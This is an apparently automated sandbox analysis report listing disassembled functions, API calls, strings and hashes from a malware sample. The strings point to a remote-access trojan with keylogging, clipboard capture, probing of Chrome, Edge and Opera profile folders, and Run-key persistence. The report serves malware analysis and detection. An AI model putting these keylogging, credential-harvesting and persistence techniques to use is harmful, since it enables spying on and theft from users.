                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                  • String ID:
                                                                  • API String ID: 1761009282-0
                                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                  • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                  • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorHandling__start
                                                                  • String ID: pow
                                                                  • API String ID: 3213639722-2276729525
                                                                  • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                  • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                                                  • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                  • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 048F34CF
                                                                    • Part of subcall function 048F31DE: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 048F3245
                                                                    • Part of subcall function 048F31DE: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 048F3274
                                                                    • Part of subcall function 048E5819: send.WS2_32(?,00000000,00000000,00000000), ref: 048E58AE
                                                                  • RegCloseKey.ADVAPI32(00000000,00463050,00463050,00469654,00469654,00000071), ref: 048F363D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                  • String ID: P0F
                                                                  • API String ID: 3114080316-3540264436
                                                                  • Opcode ID: 7235545e6e6830560f04f6a3d8adc92ff1a8d56aa726a5aa1cc8bc0bd4d16cb4
                                                                  • Instruction ID: d6ff4f7de52c335a04c06bf0ef18c56cc0c90ee86fa6dfaedb993fc6f40788c2
                                                                  • Opcode Fuzzy Hash: 7235545e6e6830560f04f6a3d8adc92ff1a8d56aa726a5aa1cc8bc0bd4d16cb4
                                                                  • Instruction Fuzzy Hash: AC41E53065434497E324F72EDD50AFF77989F96208F408E2EA54AD31D0EEE4BD4A8267
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,756F3530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                  • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                                                  Strings
                                                                  • /sort "Visit Time" /stext ", xrefs: 00404092
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                  • String ID: /sort "Visit Time" /stext "
                                                                  • API String ID: 368326130-1573945896
                                                                  • Opcode ID: 07bbdaf59ea10fd4bf408577d5838142486f191c82bc25cb54ffd13a7687c691
                                                                  • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                                                  • Opcode Fuzzy Hash: 07bbdaf59ea10fd4bf408577d5838142486f191c82bc25cb54ffd13a7687c691
                                                                  • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                                                  APIs
                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                  • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer__onexit
                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                  • API String ID: 1881088180-3686566968
                                                                  • Opcode ID: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
                                                                  • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                                                  • Opcode Fuzzy Hash: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
                                                                  • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                                                  APIs
                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 0-711371036
                                                                  • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                  • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                                                  • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                  • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                                                  APIs
                                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                                                  • IsWindowVisible.USER32(?), ref: 00415B37
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Window$TextVisible
                                                                  • String ID: (%G
                                                                  • API String ID: 1670992164-3377777310
                                                                  • Opcode ID: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
                                                                  • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                                                  • Opcode Fuzzy Hash: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
                                                                  • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0491B654
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @F$@F
                                                                  • API String ID: 4062629308-3436687868
                                                                  • Opcode ID: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                                                  • Instruction ID: 143ee5c49203e5f5c049f708da04aefeaff993278d6ffaabb295dc2e5ee8946a
                                                                  • Opcode Fuzzy Hash: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                                                  • Instruction Fuzzy Hash: 27216B71F1021C86EB186B789D0076D33979F95378F184379E8269B2F0E774B5428746
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                                                  Strings
                                                                  • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                  • API String ID: 481472006-507513762
                                                                  • Opcode ID: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
                                                                  • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                                                  • Opcode Fuzzy Hash: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
                                                                  • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID: XF
                                                                  • API String ID: 269201875-1082896132
                                                                  • Opcode ID: eba3c358ff5f7463530d74fbcc6cdba17ec45552898dfcf13cef1084320ecdf4
                                                                  • Instruction ID: 0f5486c626324d294feab44471f29b0c07679294e42c6fe1e021d2bfd6df5aa3
                                                                  • Opcode Fuzzy Hash: eba3c358ff5f7463530d74fbcc6cdba17ec45552898dfcf13cef1084320ecdf4
                                                                  • Instruction Fuzzy Hash: 6B11B671A103245FEB209F3ABC44B5632996790774F140636F961CB2F0F7B4F8854B46
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                                                  • ___raise_securityfailure.LIBCMT ref: 00432E76
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                  • String ID: (F
                                                                  • API String ID: 3761405300-3109638091
                                                                  • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                                                  • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                                                  • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                                                  • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                  • API String ID: 481472006-2430845779
                                                                  • Opcode ID: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
                                                                  • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                                                  • Opcode Fuzzy Hash: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
                                                                  • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                                                  APIs
                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: alarm.wav$x(G
                                                                  • API String ID: 1174141254-2413638199
                                                                  • Opcode ID: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
                                                                  • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                                                  • Opcode Fuzzy Hash: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
                                                                  • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                                                  APIs
                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  • CloseHandle.KERNEL32(?), ref: 00409FFD
                                                                  • UnhookWindowsHookEx.USER32 ref: 0040A010
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                  • String ID: Online Keylogger Stopped
                                                                  • API String ID: 1623830855-1496645233
                                                                  • Opcode ID: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
                                                                  • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                                                  • Opcode Fuzzy Hash: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
                                                                  • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                                                  APIs
                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                  • API String ID: 1174141254-2800177040
                                                                  • Opcode ID: 96e4f2f645069e5f5e4c934eb79c16a7dc0a9ba8d3cb9bf2acb87967b969eb58
                                                                  • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                                                  • Opcode Fuzzy Hash: 96e4f2f645069e5f5e4c934eb79c16a7dc0a9ba8d3cb9bf2acb87967b969eb58
                                                                  • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                                                  APIs
                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                  • API String ID: 1174141254-4188645398
                                                                  • Opcode ID: 7dca85de0655cbdc8cfc9d8b603e156668a071609341b80090fddc775dea4188
                                                                  • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                                                  • Opcode Fuzzy Hash: 7dca85de0655cbdc8cfc9d8b603e156668a071609341b80090fddc775dea4188
                                                                  • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                                                  APIs
                                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExistsFilePath
                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                  • API String ID: 1174141254-1629609700
                                                                  • Opcode ID: ef534406961c6a7538270c165368604e181e440150294ec6f471147a3b3f123b
                                                                  • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                                                  • Opcode Fuzzy Hash: ef534406961c6a7538270c165368604e181e440150294ec6f471147a3b3f123b
                                                                  • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                                                  APIs
                                                                  • GetKeyState.USER32(00000011), ref: 0040A597
                                                                    • Part of subcall function 00409468: GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                                                    • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                    • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                    • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                                                    • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                                                    • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                  • String ID: [AltL]$[AltR]
                                                                  • API String ID: 3195419117-2658077756
                                                                  • Opcode ID: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
                                                                  • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                                                  • Opcode Fuzzy Hash: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
                                                                  • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                                                  APIs
                                                                  • GetKeyState.USER32(00000012), ref: 0040A5F1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: State
                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                  • API String ID: 1649606143-2446555240
                                                                  • Opcode ID: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
                                                                  • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                                                  • Opcode Fuzzy Hash: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
                                                                  • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,004721E8,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,004721E8), ref: 00412422
                                                                  • RegDeleteValueW.ADVAPI32(004721E8,?,?,00472200,pth_unenc,004721E8), ref: 00412436
                                                                  Strings
                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteOpenValue
                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                  • API String ID: 2654517830-1051519024
                                                                  • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                                                  • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                                                  • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                                                  • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                                                  APIs
                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064
                                                                    • Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433072
                                                                    • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                  • String ID: P@
                                                                  • API String ID: 1586462112-676759640
                                                                  • Opcode ID: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                                                  • Instruction ID: 0bfe0c8ac6dbc9b0d4453f7df384559b02cf33d5589a4338b6e2a72978291aeb
                                                                  • Opcode Fuzzy Hash: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                                                  • Instruction Fuzzy Hash: 5CC08034C0020C77CB00F6E1C907C8D773C5D04300F405416B51091081E774531D96D5
                                                                  APIs
                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044
                                                                    • Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433052
                                                                    • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                  • String ID: P@
                                                                  • API String ID: 1586462112-676759640
                                                                  • Opcode ID: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                                                  • Instruction ID: 865ee2ddef0a897f612f6fb2ad11127a6c44acc13293d016e759f8d59b40e8c3
                                                                  • Opcode Fuzzy Hash: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                                                  • Instruction Fuzzy Hash: 15C08034C0010CB7CB00FAF5D907D8E773C5904340F409015B61091041E7B8631C87C5
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                                                  • GetLastError.KERNEL32 ref: 0043B4E9
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1717984340-0
                                                                  • Opcode ID: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                                                  • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                                                  • Opcode Fuzzy Hash: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                                                  • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
                                                                  • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastRead
                                                                  • String ID:
                                                                  • API String ID: 4100373531-0
                                                                  • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                                                  • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                                                  • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                                                  • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19